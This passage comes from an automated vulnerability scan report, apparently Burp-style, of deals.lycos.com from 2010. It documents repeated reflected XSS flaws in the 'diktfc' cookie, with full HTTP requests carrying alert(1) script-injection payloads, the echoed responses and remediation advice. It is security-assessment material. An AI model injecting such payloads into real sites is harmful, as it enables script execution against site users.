c="http://b.scorecardresearch.com/p?c1=2&c2=6036445&c3=&c4=deals.lycos.com/deal/sharp-aquos-52-1080p-lcd-hdtv-950-414587&c5=&c6=&c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Ab34d0"><script>alert(1)</script>e18b336f5a9&cj=1" alt="tracker" /> ...[SNIP]...
The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b46fb"%3balert(1)//caa31ca79e7 was submitted in the diktfc cookie. This input was echoed as b46fb";alert(1)//caa31ca79e7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /deal/sony-14mp-nex-5-dslr-w-lens-654-413823 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Ab46fb"%3balert(1)//caa31ca79e7; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:33:25 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:33:25 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 18106
The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bc337"><script>alert(1)</script>e5f7290f0d7 was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /deal/sony-14mp-nex-5-dslr-w-lens-654-413823 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Abc337"><script>alert(1)</script>e5f7290f0d7; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:33:24 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:33:24 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 18070
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... src="http://b.scorecardresearch.com/p?c1=2&c2=6036445&c3=&c4=deals.lycos.com/deal/sony-14mp-nex-5-dslr-w-lens-654-413823&c5=&c6=&c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Abc337"><script>alert(1)</script>e5f7290f0d7&cj=1" alt="tracker" /> ...[SNIP]...
The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 19f39"%3balert(1)//768516f1e93 was submitted in the diktfc cookie. This input was echoed as 19f39";alert(1)//768516f1e93 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /deal/toshiba-40-1080p-lcd-hdtv-for-450-414283 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A19f39"%3balert(1)//768516f1e93; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:32:43 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:32:43 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17283
The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 76cf0"><script>alert(1)</script>f4b8c206198 was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /deal/toshiba-40-1080p-lcd-hdtv-for-450-414283 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A76cf0"><script>alert(1)</script>f4b8c206198; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:32:41 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:32:42 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17630
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... c="http://b.scorecardresearch.com/p?c1=2&c2=6036445&c3=&c4=deals.lycos.com/deal/toshiba-40-1080p-lcd-hdtv-for-450-414283&c5=&c6=&c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A76cf0"><script>alert(1)</script>f4b8c206198&cj=1" alt="tracker" /> ...[SNIP]...
The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 201be"%3balert(1)//8d2c55d7ace was submitted in the diktfc cookie. This input was echoed as 201be";alert(1)//8d2c55d7ace in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /deal/toshiba-camileo-1080p-digital-camcorder-89-414580 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A201be"%3balert(1)//8d2c55d7ace; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:33:16 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:33:16 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 18325
The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5d968"><script>alert(1)</script>3e8a43ed830 was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /deal/toshiba-camileo-1080p-digital-camcorder-89-414580 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A5d968"><script>alert(1)</script>3e8a43ed830; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:33:14 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:33:14 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 18352
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... /b.scorecardresearch.com/p?c1=2&c2=6036445&c3=&c4=deals.lycos.com/deal/toshiba-camileo-1080p-digital-camcorder-89-414580&c5=&c6=&c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A5d968"><script>alert(1)</script>3e8a43ed830&cj=1" alt="tracker" /> ...[SNIP]...
The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bf004"><script>alert(1)</script>d27db054aad was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /deal/unlocked-mytouch-4g-smartphone-for-440-414260 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Abf004"><script>alert(1)</script>d27db054aad; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:32:49 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:32:49 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17076
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... tp://b.scorecardresearch.com/p?c1=2&c2=6036445&c3=&c4=deals.lycos.com/deal/unlocked-mytouch-4g-smartphone-for-440-414260&c5=&c6=&c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Abf004"><script>alert(1)</script>d27db054aad&cj=1" alt="tracker" /> ...[SNIP]...
The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7c684"%3balert(1)//37756b92c68 was submitted in the diktfc cookie. This input was echoed as 7c684";alert(1)//37756b92c68 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /deal/unlocked-mytouch-4g-smartphone-for-440-414260 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A7c684"%3balert(1)//37756b92c68; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:32:51 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:32:51 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17048
The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1e7f1"><script>alert(1)</script>c910f4ec3ad was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /deal/viore-24-1080p-lcd-hdtv-for-199-414568 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A1e7f1"><script>alert(1)</script>c910f4ec3ad; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:32:19 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:32:20 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 16965
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... src="http://b.scorecardresearch.com/p?c1=2&c2=6036445&c3=&c4=deals.lycos.com/deal/viore-24-1080p-lcd-hdtv-for-199-414568&c5=&c6=&c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A1e7f1"><script>alert(1)</script>c910f4ec3ad&cj=1" alt="tracker" /> ...[SNIP]...
The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1fc0a"%3balert(1)//0e43978a264 was submitted in the diktfc cookie. This input was echoed as 1fc0a";alert(1)//0e43978a264 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /deal/viore-24-1080p-lcd-hdtv-for-199-414568 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A1fc0a"%3balert(1)//0e43978a264; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:32:20 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:32:21 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 16946
The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f05d3"><script>alert(1)</script>ce60a599871 was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /deals HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Af05d3"><script>alert(1)</script>ce60a599871; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:31:37 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:31:38 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 46445
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <img src="http://b.scorecardresearch.com/p?c1=2&c2=6036445&c3=&c4=deals.lycos.com/deals&c5=&c6=&c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Af05d3"><script>alert(1)</script>ce60a599871&cj=1" alt="tracker" /> ...[SNIP]...
The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e1982"%3balert(1)//13da987201f was submitted in the diktfc cookie. This input was echoed as e1982";alert(1)//13da987201f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /deals HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Ae1982"%3balert(1)//13da987201f; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:31:39 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:31:39 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 46478
The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 25659"><script>alert(1)</script>669e5c4d6cc was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /deals/category/automotive-238 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A25659"><script>alert(1)</script>669e5c4d6cc; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:29:57 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:29:57 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 43807
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <img src="http://b.scorecardresearch.com/p?c1=2&c2=6036445&c3=&c4=deals.lycos.com/deals/category/automotive-238&c5=&c6=&c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A25659"><script>alert(1)</script>669e5c4d6cc&cj=1" alt="tracker" /> ...[SNIP]...
The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5b2d5"%3balert(1)//27c5d3438ff was submitted in the diktfc cookie. This input was echoed as 5b2d5";alert(1)//27c5d3438ff in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /deals/category/automotive-238 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
